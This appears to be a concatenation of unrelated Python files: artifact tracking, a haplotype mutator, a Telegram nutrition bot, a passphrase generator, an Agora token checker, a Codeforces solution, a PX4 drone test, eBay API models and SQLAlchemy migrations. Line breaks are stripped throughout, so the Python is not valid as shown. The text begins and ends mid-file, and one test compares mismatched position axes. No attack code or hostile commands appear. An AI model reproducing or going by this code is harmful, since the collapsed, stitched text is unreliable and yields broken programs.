ValueError("Failed to record revision change for unknown firmware named '{}'".format(name)) def record_app_lifecycle_status_change(self, name, lifecycle_state=None, status=True, message=None): deployed_artifact = self.__lookup_deployed_artifact(name, ArtifactKind.application) if deployed_artifact is not None: deployed_artifact.amend_lifecycle_info(lifecycle_state, status, message) else: raise ValueError("Failed to record lifecycle status change for unknown application named '{}'".format(name)) def __lookup_deployed_artifact(self, name, kind): for deployed_artifact in self.deployed_artifacts.deployed_artifacts: if deployed_artifact.name == name and deployed_artifact.kind == kind: return deployed_artifact return None def __append_deployed_artifact(self, deployed_artifact): self.deployed_artifacts.deployed_artifacts.append(deployed_artifact) def __remove_deployed_artifact(self, deployed_artifact): self.deployed_artifacts.deployed_artifacts.remove(deployed_artifact) def __exit__(self, exc_type, exc_val, exc_tb): DeployedArtifacts.save_deployed_artifacts(self.deployed_artifacts, self.config.deployed_artifacts_path) aponsero/Haplo_mock_generator #!/usr/bin/env python3 from Bio import SeqIO from Bio.Seq import Seq from Bio.SeqRecord import SeqRecord import random import itertools import sys, getopt import argparse def get_args(): parser = argparse.ArgumentParser(description='create a new haplotype with random mutations') parser.add_argument('-f', '--file', help='file_genome', type=str, metavar='FILE', required=True) parser.add_argument('-n', '--name', help='name_haplotype', type=str, metavar='NAME', required=True) parser.add_argument('-m', '--mutation', help='mutation rate', type=float, metavar='MUTATION', required=True) parser.add_argument('-o', '--output', help='output directory', type=str, metavar='OUTPUT', required=True) return parser.parse_args() def mutate(orig_string, mutation_rate): bases = "ACGT" result = "" mutations = [] for base in orig_string: if random.random() < mutation_rate: new_base = bases[bases.index(base) - random.randint(1, 3)] # negatives are OK result += new_base mutations.append((base, new_base)) else: result += base print(mutations) return result def main(): args = get_args() outfile= args.output infile=args.file haplo_name=args.name mutation_rate=args.mutation for record in SeqIO.parse(infile, "fasta"): with open(outfile, "w") as output_handle: string=record.seq #print(string) result = mutate(string, mutation_rate) #print(result) new_seq=Seq(result) new_record= SeqRecord(new_seq, id=haplo_name) SeqIO.write(new_record, output_handle, "fasta") if __name__ == "__main__":main() import os from dotenv import dotenv_values from telegram import Update from telegram.ext import CallbackContext def chunks(itr, mapper, max_n=64): """Yield successive n-sized chunks from lst.""" res = [] i = 0 for row in itr: if i % max_n == 0 and res: yield res res = [] res.append(mapper(row)) i += 1 yield res def kcal_calc(weight, height, age, sex, activity, **kwargs): if sex == 0: bmr = 88.36 + (13.4 * weight) + (4.8 * height) - (5.7 * age) else: bmr = 447.6 + (9.2 * weight) + (3.1 * height) - (4.3 * age) if activity == 0: bmr *= 1.2 elif activity == 1: bmr *= 1.375 elif activity == 2: bmr *= 1.55 elif activity == 3: bmr *= 1.725 elif activity == 4: bmr *= 1.9 return bmr def send_like_product(update: Update, context: CallbackContext, name: str): db_connect = context.bot_data['db_connect'] result = db_connect.products.select_like(name, 20) if result: res_str = 'Likes products\n' res_str += 'Product: F\\P\\C Kcal\n' for row in result: res_str += '"{name}": {fat}\\{protein}\\{carbohydrates} {kcal}\n'.format(**row) update.message.reply_text(res_str) else: update.message.reply_text('Not found') def get_db_conf(): return dotenv_values(os.path.join(os.path.dirname(__file__), '.env.db')) def get_bot_conf(): return dotenv_values(os.path.join(os.path.dirname(__file__), '.env.bot')) 0 import cv2 import numpy as np cap = cv2.VideoCapture(0) while True: _, frame = cap.read() hsv = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY) lower_white = np.array([0,0,0]) upper_white = np.array([255,255,255]) mask = cv2.inRange(hsv,lower_white,upper_white) res = cv2.bitwise_and(frame,frame,mask = mask) cv2.imshow('frame',frame) cv2.imshow('mask',mask) cv2.imshow('res',res) k = cv2.waitKey(5) & 0xFF if k == 27: break cv2.destroyAllWindows() cap.release()import random # https://simple.wikipedia.org/wiki/Leet letters_nums = {"b": "8", "e": "3", "i": "1", "o": "0", "s": "5", "t": "7"} # Based on dividing the keyboard into two halfs.. -1 for left side and 1 for right side. letters_map = {'a': -1, 'c': -1, 'd': -1, 'e': -1, 'f': -1, 'q': -1, 'r': -1, 's': -1, 'v': -1, 'w': -1, 'x': -1, 'z': -1, "1": -1, "2": -1, "3": -1, "4": -1, "5": - 1, "!": -1, 'b': 1, 'g': 0, 'h': 1, 'i': 1, 'j': 1, 'k': 1, 'l': 1, 'm': 1, 'n': 1, 'o': 1, 'p': 1, 't': 0, 'u': 1, 'y': 1, "6": 1, "7": 1, "8": 1, "9": 1, "0": 1} def read(lang_file): # Openning the language's words file and loading it into a list with open(lang_file, "r") as file: words_lst = list(file) # Randomizing the words list random.shuffle(words_lst) # Words dictionary with length and whether easy typing or not words = {} # Deciding the word's length and calculating a score for easy tpying for word in words_lst: word = word.strip("\n") if word not in words: words[word] = {"len": len(word), "easy": False} easy_score = 0 for letter in word: if letter in letters_map: easy_score += letters_map[letter] # If the words divide almost equally between the two sides of the keyboard, congrats, it is an easy word! if easy_score in [-1, 0, 1]: words[word]["easy"] = True return words def generate(words, min_len, max_len, min_word_len, max_word_len, words_per_pwd=4): # Filtering words based on length filtered_words = {} for word in words: if min_word_len <= words[word]["len"] <= max_word_len: filtered_words[word] = len(word) used = {} passwords = [] # Generating passwords to fit the chosen criteria total = 0 while total < 10: password = "" password_lst = [] current_word_size = max_len for word in filtered_words: if ((word not in used and len(password_lst) < words_per_pwd) and ((len(password)+filtered_words[word] < min_len) or (filtered_words[word] < current_word_size))): password += word password_lst.append(word.lower()) used[word] = "USED" current_word_size = current_word_size - filtered_words[word] if (len(password_lst) == 4) and (min_len <= len("".join(password_lst)) <= max_len): passwords.append(password_lst) password = "" current_word_size = max_len total += 1 return passwords def easy(words): # Filtering based on easy typing easy = {} for word in words: if words[word]["easy"] == True and word not in easy: easy[word] = {"len": words[word]["len"]} return easy def numbers(passwords): # Doing letter/number substitutions for i in range(len(passwords)): for j in range(len(passwords[i])): passwords[i][j] = list(passwords[i][j]) for k in range(len(passwords[i][j])): if passwords[i][j][k] in letters_nums: passwords[i][j][k] = letters_nums[passwords[i][j][k]] passwords[i][j] = "".join(passwords[i][j]) return passwords ESA-CCI-ODP/mjml-stub from ._head_base import HeadComponent from mjml.helpers import omit __all__ = ['MjAttributes'] class MjAttributes(HeadComponent): def handler(self): add = self.context['add'] _children = self.props.children for child in _children: tagName = child['tagName'] attributes = child['attributes'] children = child['children'] if tagName == 'mj-class': attr_name = attributes['name'] add('classes', attr_name, omit(attributes, 'name')) assert not children, 'not yet implemented' # upstream: # reduce( # children, # (acc, { tagName, attributes }) => ({ # ...acc, # [tagName]: attributes, # }), # {}, # ), #def reducer(acc, tn_attr): # tagName, attributes = tn_attr # return {'tagName': attributes, **acc} #add('classesDefault', attr_name, reduce(children, reducer, {})) else: if not attributes: # TODO: not present upstream continue add('defaultAttributes', tagName, attributes) import os, sys, array, time import numpy as np from optparse import OptionParser from basic.common import checkToSkip, printStatus INFO = 'mlengine.fiksvm.find_min_max.py' def process(options, feat_dir): resultfile = os.path.join(feat_dir, 'minmax.txt') if checkToSkip(resultfile, options.overwrite): sys.exit(0) nr_of_images, feat_dim = map(int, open(os.path.join(feat_dir,'shape.txt')).readline().split()) min_vals = [1e6] * feat_dim max_vals = [-1e6] * feat_dim offset = np.float32(1).nbytes * feat_dim res = array.array('f') feat_file = os.path.join(feat_dir, 'feature.bin') id_file = os.path.join(feat_dir, 'id.txt') nr_of_images = len(open(id_file).readline().strip().split()) printStatus(INFO, 'parsing %s' % feat_file) fr = open(feat_file, 'rb') s_time = time.time() for i in xrange(nr_of_images): res.fromfile(fr, feat_dim) vec = res for d in xrange(feat_dim): if vec[d] > max_vals[d]: max_vals[d] = vec[d] if vec[d] < min_vals[d]: min_vals[d] = vec[d] del res[:] fr.close() timecost = time.time() - s_time printStatus(INFO, "%g seconds to find min [%g,%g] and max [%g,%g]" % (timecost, min(min_vals), max(min_vals), min(max_vals), max(max_vals))) with open(resultfile, 'w') as f: f.write('%s\n' % ' '.join(map(str, min_vals))) f.write('%s\n' % ' '.join(map(str, max_vals))) f.close() def main(argv=None): if argv is None: argv = sys.argv[1:] parser = OptionParser(usage="""usage: %prog [options] feat_dir""") parser.add_option("--overwrite", default=0, type="int", help="overwrite existing file (default=0)") (options, args) = parser.parse_args(argv) if len(args) < 1: parser.print_help() return 1 return process(options, args[0]) if __name__ == "__main__": sys.exit(main()) 0 # example of overloading __iter__ and __next__ - multy iteration class SkipObject: """Return nefw iterator every time for each __iter__() call """ def __init__(self, wrapped): self.wrapped = wrapped def __iter__(self): return SkipIterator(self.wrapped) class SkipIterator: """Multiply iteration """ def __init__(self, wrapped): self.wrapped = wrapped self.offset = 0 # iterators counter def __next__(self): if self.offset >= len(self.wrapped): # stop iteration raise StopIteration else: item = self.wrapped[self.offset] # iteration self.offset += 2 return item if __name__ == '__main__': text = 'abcde' skipper = SkipObject(text) I = iter(skipper) # indexes print(next(I), next(I), next(I)) for x in skipper: for y in skipper: print((x + y)*2, end=' ') # -*- coding: utf-8 -*- __author__ = "" import hmac import json import time from zlib import crc32 from utils import packer from hashlib import sha256 from collections import OrderedDict from agoratoken import token_v6 def check_key_v6(key, **kwargs): parsed, signature, app_id, cname_crc, uid_crc, ts, salt, privilege = token_v6.AgoraTokenV6.analyze(key) if not parsed: print('[Check] Failed to analyze token') return print('[Check] AccessToken(V6), Signature: {}, AppId: {}, CRC(ChannelName): {}, CRC(Uid): {}, Ts: {}, ' 'Salt: {}, privilege: {}'.format(signature, app_id, cname_crc, uid_crc, ts, salt, ','.join(['{}:{}'.format(x, y) for x, y in privilege.items()]))) now_ts = int(time.time()) if ts < now_ts: print('[Check] Error: token expired, now ts: {}, expired at {}'.format(now_ts, ts)) for p, t in privilege.items(): if t < now_ts: print('[Check] Error: token privilege expired, privilege: {}, now ts: {}, expired at {}'.format(p, now_ts, t)) with open('configs/project.json') as f: project = json.load(f) config_app_id = project.get('appID', '') config_app_cert = project.get('appCert', '') if config_app_id != app_id: print('[Check] Error: appID not same, stop checker') return params = dict(kwargs) channel = params.get('channel', '') user = params.get('user', '') if not channel and not user: print('[Check] Warn: cname, uid and signature not checked') return if cname_crc != crc32(channel.encode('utf-8')) & 0xffffffff: print('[Check] Error: channel name crc32 not same') if uid_crc != crc32(user.encode('utf-8')) & 0xffffffff: print('[Check] Error: user id crc32 not same') val = app_id.encode('utf-8') + channel.encode('utf-8') + user.encode('utf-8') + packer.pack_uint32(salt) + \ packer.pack_uint32(ts) + packer.pack_map_uint32(OrderedDict(sorted(iter(privilege.items()), key=lambda x: int(x[0])))) if signature != hmac.new(config_app_cert.encode('utf-8'), val, sha256).digest().hex(): print('[Check] Error: signature not same') codeforces/664A_gcd.py #!/usr/bin/env python3 # 664A_gcd.py - Codeforces.com/problemset/problem/664/A by import unittest import sys ############################################################################### # Gcd Class (Main Program) ############################################################################### class Gcd: """ Gcd representation """ def __init__(self, test_inputs=None): """ Default constructor """ it = iter(test_inputs.split("\n")) if test_inputs else None def uinput(): return next(it) if it else sys.stdin.readline().rstrip() # Reading single elements [self.a, self.b] = map(int, uinput().split()) def calculate(self): """ Main calcualtion function of the class """ result = 1 if self.a != self.b else self.a return str(result) ############################################################################### # Unit Tests ############################################################################### class unitTests(unittest.TestCase): def test_single_test(self): """ Gcd class testing """ # Constructor test test = "1 2" d = Gcd(test) self.assertEqual(d.a, 1) # Sample test self.assertEqual(Gcd(test).calculate(), "1") # Sample test test = "61803398874989484820458683436563811772030917980576 61803398874989484820458683436563811772030917980576" self.assertEqual(Gcd(test).calculate(), "61803398874989484820458683436563811772030917980576") # Sample test test = "" # self.assertEqual(Gcd(test).calculate(), "0") # My tests test = "" # self.assertEqual(Gcd(test).calculate(), "0") # Time limit test # self.time_limit_test(5000) def time_limit_test(self, nmax): """ Timelimit testing """ import random import timeit # Random inputs test = str(nmax) + " " + str(nmax) + "\n" numnums = [str(i) + " " + str(i+1) for i in range(nmax)] test += "\n".join(numnums) + "\n" nums = [random.randint(1, 10000) for i in range(nmax)] test += " ".join(map(str, nums)) + "\n" # Run the test start = timeit.default_timer() d = Gcd(test) calc = timeit.default_timer() d.calculate() stop = timeit.default_timer() print("\nTimelimit Test: " + "{0:.3f}s (init {1:.3f}s calc {2:.3f}s)". format(stop-start, calc-start, stop-calc)) if __name__ == "__main__": # Avoiding recursion limitaions sys.setrecursionlimit(100000) if sys.argv[-1] == "-ut": unittest.main(argv=[" "]) # Print the result string sys.stdout.write(Gcd().calculate()) bollwyvl/nb-livereloadsetup.py1-10 #!/usr/bin/env python # -*- coding: utf-8 -*- from setuptools import setup from os.path import join # should be loaded below __version__ = None with open(join("src", "nblivereload", "_version.py")) as version: exec(version.read()) with open('./README.rst') as readme: README = readme.read() setup( name="nblivereload", version=__version__, description="Autoreload static files in the Jupyter Notebook", long_description=README, author="", author_email="", license="BSD-3-Clause", url="https://github.com/bollwyvl/nb-livereload", keywords="ipython jupyter livereload", classifiers=[ "Development Status :: 4 - Beta", "Framework :: IPython", "Programming Language :: Python", "License :: OSI Approved :: BSD License" ], package_dir={"": "src"}, packages=["nblivereload"], setup_requires=["notebook", "livereload"], tests_require=["pytest", "requests"], include_package_data=True ) 0 class GameConfig: def __init__(self): self.dimension = 2 self.El = 2 self.Eu = 3 self.Fl = 3 self.Fu = 3 class SpawnConfig: @staticmethod def Block(other=None): return SpawnConfig({(1, 1), (1, 2), (2, 1), (2, 2)}, other) @staticmethod def Blinker(other=None): return SpawnConfig({(5, 2), (5, 1), (5, 3)}, other) @staticmethod def Tub(other=None): return SpawnConfig({(9, 2), (10, 1), (10, 3), (11, 2)}, other) @staticmethod def All(): return SpawnConfig.Block(SpawnConfig.Tub(SpawnConfig.Blinker())) def __init__(self, initSet=None, other=None): self.initSet = initSet if other is not None: self.initSet.update(other.initSet) self.initSpawnRate = 0.3 self.initSpawnDistance = 5 self.initTotal = 300#0.5 * pow(self.initSpawnDistance, 2) # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. """Arguments for the model. """ import os import sys from pathlib import Path # pylint:disable=line-too-long class Args: """Arguments for the model.""" training_data_dir: str = None bert_model: str = None task_name: str = None model_dir: str = None cleanup_output_dir: bool = False cache_dir: str = "" max_seq_length: int = 128 do_train: bool = None do_eval: bool = None do_lower_case: bool = None train_batch_size: int = 4 eval_batch_size: int = 8 learning_rate: float = 5e-5 num_train_epochs: float = 3.0 warmup_proportion: float = 0.1 no_cuda: bool = None local_rank: int = -1 seed: int = 42 gradient_accumulation_steps: int = 1 fp16: bool = None loss_scale: float = 0 @classmethod def for_flight_booking( cls, training_data_dir: str = os.path.abspath( os.path.join(os.path.dirname(os.path.abspath(__file__)), "../training_data") ), task_name: str = "flight_booking", ): """Return the flight booking args.""" args = cls() args.training_data_dir = training_data_dir args.task_name = task_name home_dir = str(Path.home()) args.model_dir = os.path.abspath(os.path.join(home_dir, "models/bert")) args.bert_model = "bert-base-uncased" args.do_lower_case = True print( f"Bert Model training_data_dir is set to {args.training_data_dir}", file=sys.stderr, ) print(f"Bert Model model_dir is set to {args.model_dir}", file=sys.stderr) return args """events Revision ID: 9c92c85163a9 Revises: Create Date: 2016-05-09 19:04:44.498817 """ from alembic import op import sqlalchemy as sa from sqlalchemy.dialects import postgresql # revision identifiers, used by Alembic. revision = '9c92c85163a9' down_revision = '6' def upgrade(): op.create_table('event', sa.Column('id', sa.BigInteger(), nullable=False), sa.Column('origin', sa.Unicode(), nullable=True), sa.Column('data', postgresql.JSONB(), nullable=True), sa.Column('created_at', postgresql.TIMESTAMP(), autoincrement=False, nullable=True), sa.PrimaryKeyConstraint('id') ) op.drop_table('processing_log') def downgrade(): op.create_table('processing_log', sa.Column('created_at', postgresql.TIMESTAMP(), autoincrement=False, nullable=True), sa.Column('updated_at', postgresql.TIMESTAMP(), autoincrement=False, nullable=True), sa.Column('id', sa.BIGINT(), nullable=False), sa.Column('operation', sa.VARCHAR(), autoincrement=False, nullable=True), sa.Column('component', sa.VARCHAR(), autoincrement=False, nullable=True), sa.Column('source_location', sa.VARCHAR(), autoincrement=False, nullable=True), sa.Column('content_hash', sa.VARCHAR(length=65), autoincrement=False, nullable=True), sa.Column('foreign_id', sa.VARCHAR(), autoincrement=False, nullable=True), sa.Column('source_id', sa.INTEGER(), autoincrement=False, nullable=True), sa.Column('document_id', sa.BIGINT(), autoincrement=False, nullable=True), sa.Column('meta', postgresql.JSONB(), autoincrement=False, nullable=True), sa.Column('error_type', sa.VARCHAR(), autoincrement=False, nullable=True), sa.Column('error_message', sa.VARCHAR(), autoincrement=False, nullable=True), sa.Column('error_details', sa.VARCHAR(), autoincrement=False, nullable=True), sa.PrimaryKeyConstraint('id', name=u'processing_log_pkey') ) op.drop_table('event') from abc import abstractmethod from pandas.core.frame import DataFrame from sqlalchemy import Table from sqlalchemy.engine.base import Engine from .gen import AbstractExecutionGenerator, FullMerge from .util import derive_staging, recreate_table import logging class AbstractDbLoader: @abstractmethod def __call__(self, df: DataFrame, table: Table, engine: Engine): pass class PandasDbLoader(AbstractDbLoader): def __init__(self, **kwargs): self.load_kwargs = {"index": False, "chunksize": 20000, "if_exists": "append"} self.load_kwargs.update(kwargs) def __call__(self, df: DataFrame, table: Table, engine: Engine): df.to_sql(table.name, engine, schema=table.schema, **self.load_kwargs) class PandasLoad: def __init__(self, engine): self.engine = engine def load_db( self, target: Table, dataframe: DataFrame, execution_generator: AbstractExecutionGenerator = FullMerge, db_loader: AbstractDbLoader = PandasDbLoader(), ): source = derive_staging(target, list(dataframe.columns)) recreate_table(source, self.engine) db_loader(dataframe, source, self.engine) with self.engine.begin() as conn: for stmt in execution_generator(source, target): logging.info(f"Executing: {stmt}") conn.execute(stmt) #!/usr/bin/env python2 #*************************************************************************** # # Copyright (c) 2015 PX4 Development Team. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in # the documentation and/or other materials provided with the # distribution. # 3. Neither the name PX4 nor the names of its contributors may be # used to endorse or promote products derived from this software # without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS # OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED # AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # #***************************************************************************/ # # @author <> # # The shebang of this file is currently Python2 because some # dependencies such as pymavlink don't play well with Python3 yet. from __future__ import division PKG = 'px4' import rospy from geometry_msgs.msg import Quaternion, Vector3 from mavros_msgs.msg import AttitudeTarget from mavros_test_common import MavrosTestCommon from pymavlink import mavutil from std_msgs.msg import Header from threading import Thread from tf.transformations import quaternion_from_euler class MavrosOffboardAttctlTest(MavrosTestCommon): """ Tests flying in offboard control by sending attitude and thrust setpoints via MAVROS. For the test to be successful it needs to cross a certain boundary in time. """ def setUp(self): super(MavrosOffboardAttctlTest, self).setUp() self.att = AttitudeTarget() self.att_setpoint_pub = rospy.Publisher( 'mavros/setpoint_raw/attitude', AttitudeTarget, queue_size=1) # send setpoints in seperate thread to better prevent failsafe self.att_thread = Thread(target=self.send_att, args=()) self.att_thread.daemon = True self.att_thread.start() def tearDown(self): super(MavrosOffboardAttctlTest, self).tearDown() # # Helper methods # def send_att(self): rate = rospy.Rate(10) # Hz self.att.body_rate = Vector3() self.att.header = Header() self.att.header.frame_id = "base_footprint" self.att.orientation = Quaternion(*quaternion_from_euler(0.25, 0.25, 0)) self.att.thrust = 0.7 self.att.type_mask = 7 # ignore body rate while not rospy.is_shutdown(): self.att.header.stamp = rospy.Time.now() self.att_setpoint_pub.publish(self.att) try: # prevent garbage in console output when thread is killed rate.sleep() except rospy.ROSInterruptException: pass # # Test method # def test_attctl(self): """Test offboard attitude control""" # boundary to cross boundary_x = 5 boundary_y = 5 boundary_z = -5 # make sure the simulation is ready to start the mission self.wait_for_topics(60) self.wait_for_landed_state(mavutil.mavlink.MAV_LANDED_STATE_ON_GROUND, 10, -1) self.log_topic_vars() self.set_mode("OFFBOARD", 5) self.set_arm(True, 5) rospy.loginfo("run mission") rospy.loginfo("attempting to cross boundary | x: {0}, y: {1}, z: {2}". format(boundary_x, boundary_y, boundary_z)) # does it cross expected boundaries in 'timeout' seconds? timeout = 12 # (int) seconds loop_freq = 2 # Hz rate = rospy.Rate(loop_freq) crossed = False for i in xrange(timeout * loop_freq): if (self.local_position.pose.position.x > boundary_x and self.local_position.pose.position.z > boundary_y and self.local_position.pose.position.y < boundary_z): rospy.loginfo("boundary crossed | seconds: {0} of {1}".format( i / loop_freq, timeout)) crossed = True break try: rate.sleep() except rospy.ROSException as e: self.fail(e) self.assertTrue(crossed, ( "took too long to cross boundaries | current position x: {0:.2f}, y: {1:.2f}, z: {2:.2f} | timeout(seconds): {3}". format(self.local_position.pose.position.x, self.local_position.pose.position.y, self.local_position.pose.position.z, timeout))) self.set_arm(False, 5) if __name__ == '__main__': import rostest rospy.init_node('test_node', anonymous=True) rostest.rosrun(PKG, 'mavros_offboard_attctl_test', MavrosOffboardAttctlTest) gbm001/ebay_rest # coding: utf-8 """ Recommendation API The Recommendation API returns information that sellers can use to optimize the configuration of their listings on eBay.

Currently, the API contains a single method, findListingRecommendations. This method provides information that sellers can use to configure Promoted Listings ad campaigns to maximize the visibility of their items in the eBay marketplace. # noqa: E501 OpenAPI spec version: 1.1.0 Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six class BidPercentages(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'basis': 'str', 'value': 'str' } attribute_map = { 'basis': 'basis', 'value': 'value' } def __init__(self, basis=None, value=None): # noqa: E501 """BidPercentages - a model defined in Swagger""" # noqa: E501 self._basis = None self._value = None self.discriminator = None if basis is not None: self.basis = basis if value is not None: self.value = value @property def basis(self): """Gets the basis of this BidPercentages. # noqa: E501 The basis by which the ad rate is calculated. Valid Values: ITEM and TRENDING For implementation help, refer to eBay API documentation # noqa: E501 :return: The basis of this BidPercentages. # noqa: E501 :rtype: str """ return self._basis @basis.setter def basis(self, basis): """Sets the basis of this BidPercentages. The basis by which the ad rate is calculated. Valid Values: ITEM and TRENDING For implementation help, refer to eBay API documentation # noqa: E501 :param basis: The basis of this BidPercentages. # noqa: E501 :type: str """ self._basis = basis @property def value(self): """Gets the value of this BidPercentages. # noqa: E501 The bid percentage data is a single precision value, as calculated by the associated basis. In Promoted listings ad campaigns, the bid percentage (also known as the ad rate) is a user-defined value that sets the level that eBay raises the visibility of the listing in the marketplace. It is also the rate that is used to calculate the Promoted Listings fee. Minimum value: 1.0   Maximum value: 100.0 # noqa: E501 :return: The value of this BidPercentages. # noqa: E501 :rtype: str """ return self._value @value.setter def value(self, value): """Sets the value of this BidPercentages. The bid percentage data is a single precision value, as calculated by the associated basis. In Promoted listings ad campaigns, the bid percentage (also known as the ad rate) is a user-defined value that sets the level that eBay raises the visibility of the listing in the marketplace. It is also the rate that is used to calculate the Promoted Listings fee. Minimum value: 1.0   Maximum value: 100.0 # noqa: E501 :param value: The value of this BidPercentages. # noqa: E501 :type: str """ self._value = value def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value if issubclass(BidPercentages, dict): for key, value in self.items(): result[key] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, BidPercentages): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other """SQLAlchemy models for the application """ import sqlalchemy.ext.declarative from sqlalchemy import Column, Integer, DateTime, String, func class IntEnum(sqlalchemy.types.TypeDecorator): """Add an integer enum class""" impl = sqlalchemy.Integer def __init__(self, enumtype, *args, **kwargs): super().__init__(*args, **kwargs) self._enumtype = enumtype def process_bind_param(self, value, dialect): return value.value def process_result_value(self, value, dialect): return self._enumtype(value) class ReprBase(object): """Extend the base class Provides a nicer representation when a class instance is printed. Found on the SA wiki """ def __repr__(self): return "%s(%s)" % ( (self.__class__.__name__), ", ".join( [ "%s=%r" % (key, getattr(self, key)) for key in sorted(self.__dict__.keys()) if not key.startswith("_") ] ), ) # base class for SQLAlchemy declarative models. Inherits ReprBase to get nicer __repr__ behaviour DeclarativeBase = sqlalchemy.ext.declarative.declarative_base(cls=ReprBase) class RegisteringFraObjekt(DeclarativeBase): # SQLALchemy knows abstract classes do not map to a table. # If class is not declared abstract then SQLAlchemy whines about missing table declaration. __abstract__ = True objectid = Column(Integer, primary_key=True) _registreringfra = Column( "registreringfra", DateTime(timezone=True), nullable=False, default=func.sysdate(), ) @property def registreringfra(self): return self._registreringfra class RegisteringTidObjekt(DeclarativeBase): # SQLALchemy knows abstract classes do not map to a table. # If class is not declared abstract then SQLAlchemy whines about missing table declaration. __abstract__ = True objectid = Column(Integer, primary_key=True) _registreringfra = Column( "registreringfra", DateTime(timezone=True), nullable=False, default=func.sysdate(), ) _registreringtil = Column("registreringtil", DateTime(timezone=True)) @property def registreringfra(self): return self._registreringfra @property def registreringtil(self): return self._registreringtil class Konfiguration(DeclarativeBase): """ Konfigurationstabel for FIRE. Tabellen har det særpræg at der kun kan indlæses en række i den. Den indeholder derfor altid den nye udgave af opsætningen. Tabellen er skabt for at kunne holde styr på systemspecifikke detaljer, der kan ændre sig over tid, fx basestier på et filsystem. """ __tablename__ = "konfiguration" objectid = Column(Integer, primary_key=True) dir_skitser = Column(String, nullable=False) dir_materiale = Column(String, nullable=False) # Expose these types from .geometry import * from .punkttyper import * from .sagstyper import * tensorqtl/__init__.py __version__ = "0.1.0" from .tensorqtl import * from naive_bayes_model import * if __name__ == "__main__": Xtrain, Ytrain = fetch_data("./Data/training_data.csv", "./Data/training_labels.csv") Xtest, Ytest = fetch_data("./Data/testing_data.csv", "./Data/testing_labels.csv") model = Naive_Bayes_Model() model.train(Xtrain, Ytrain) model.test(Xtest, Ytest) save_model("./Results/twitter_sentiment_naive_bayes.model", model) #! /usr/bin/python # # This code is based on dynamic_action.py of the actionlib package, written by # . # Adapted to work for services by at Synapticon GmbH. # # ********************************************************** # Software License Agreement (BSD License) # # Copyright (c) 2009, , Inc. # Copyright (c) 2018, Synapticon GmbH # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # * Neither the name of , Inc. nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # ********************************************************** """Helper class to load service message types.""" import roslib import rospy import sys class DynamicService(object): """Provides types of the given service message.""" def __init__(self, name): """Initialize. Args: name (str): Name of the service type (e.g. "std_srvs/SetBool"). """ self.name = name self.base = self.load_submsg('') self.request = self.load_submsg('Request') self.response = self.load_submsg('Response') def load_submsg(self, subname): """Load submessage. Args: subname (str): Suffix that is added to the type. Returns: The sub-message type. """ msgclass = roslib.message.get_service_class(self.name + subname) if msgclass is None: rospy.logfatal('Could not load message for: %s' % (self.name + subname)) sys.exit(1) return msgclass ''' 연속 부분 최대합 n개의 숫자가 주어질 때, 연속 부분을 선택하여 그 합을 최대화 하는 프로그램을 작성하시오. 예를 들어, 다음과 같이 